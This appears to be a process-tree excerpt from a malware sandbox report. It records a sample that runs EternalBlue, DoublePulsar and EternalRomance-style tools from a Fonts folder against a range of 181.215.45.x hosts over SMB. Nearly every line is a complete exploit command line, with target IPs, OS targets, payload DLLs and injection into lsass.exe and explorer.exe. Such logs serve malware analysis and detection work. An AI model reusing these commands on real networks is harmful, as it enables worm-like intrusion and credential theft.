C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.45.150 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.45.150.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵
- Drops file in Windows directory
PID:11244
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.45.150 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.150.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:11308
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.45.150 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵
- Drops file in Windows directory
PID:11760
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.45.150 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:8048
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.45.150 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:5672
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.45.150 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9132
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.45.150 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9004
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.45.150 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.150.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:8600
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.45.150 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:10952
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.45.150 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:12112
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.45.1553⤵PID:10888
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.45.155 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.45.155.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:10144
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.45.155 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.155.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:10580
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.45.155 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:11096
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.45.155 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:1164
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.45.155 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵
- Drops file in Windows directory
PID:7840
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.45.155 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:8228
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.45.155 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:312
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.45.155 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.155.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:8392
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.45.155 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:10872
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.45.155 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9880
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.45.1573⤵PID:10620
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.45.157 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.45.157.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:4768
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.45.157 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.157.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:11528
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.45.157 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:4648
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.45.157 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:5608
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.45.157 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:8152
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.45.157 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:6840
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.45.157 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:8336
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.45.157 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.157.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Time Discovery
PID:9468
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.45.157 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9404
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.45.157 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:8504
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.45.1683⤵PID:5792
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.45.168 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.45.168.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:804
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.45.168 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.168.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Time Discovery
PID:7712
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.45.168 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:1832
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.45.168 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:984
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.45.168 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:8300
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.45.168 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9100
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.45.168 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:8368
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.45.168 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.168.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:9604
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.45.168 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵
- Drops file in Windows directory
PID:9796
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.45.168 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9264
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.45.1713⤵PID:10600
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.45.171 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.45.171.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:10948
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.45.171 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.171.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:4072
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.45.171 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:5388
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.45.171 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:8500
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.45.171 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:7200
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.45.171 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵
- System Location Discovery: System Language Discovery
PID:5612
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.45.171 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9816
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.45.171 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.171.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Time Discovery
PID:9852
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.45.171 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9952
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.45.171 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.45.1813⤵PID:10848
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.45.181 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.45.181.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:968
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.45.181 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.181.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:2872
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.45.181 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵
- Drops file in Windows directory
PID:2264
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.45.181 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:476
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.45.181 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:4992
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.45.181 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:10656
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.45.2103⤵PID:10912
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.45.210 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.45.210.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:6844
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.45.210 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.210.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:11312
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.45.210 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:7836
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.45.210 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:4016
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.45.210 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:6828
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.45.210 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵
- Drops file in Windows directory
PID:9084
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.45.210 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵
- System Location Discovery: System Language Discovery
PID:9068
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.45.210 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.210.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Time Discovery
PID:8736
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.45.210 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:10900
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.45.210 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵
- System Location Discovery: System Language Discovery
PID:5372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.45.2123⤵PID:10940
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.45.212 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.45.212.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:10168
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.45.212 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.212.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:12008
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.45.212 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:7972
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.45.212 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:5540
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.45.212 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵
- System Location Discovery: System Language Discovery
- System Time Discovery
PID:5232
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.45.212 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:10756
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.45.212 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵
- System Location Discovery: System Language Discovery
PID:6604
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.45.212 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.212.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:9580
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.45.212 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:11340
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.45.212 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:7476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.45.2443⤵PID:10916
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.45.244 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.45.244.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:10288
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.45.244 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.244.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:5972
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.45.244 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:5008
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.45.244 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:4212
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.45.244 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵
- System Location Discovery: System Language Discovery
PID:5272
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.45.244 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:8428
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.45.244 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9076
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.45.244 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.244.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- Drops file in Windows directory
PID:5480
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.45.244 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:11836
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.45.244 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:10696
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.1 -n 383⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10992
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}1⤵
- Drops startup file
PID:4744
-
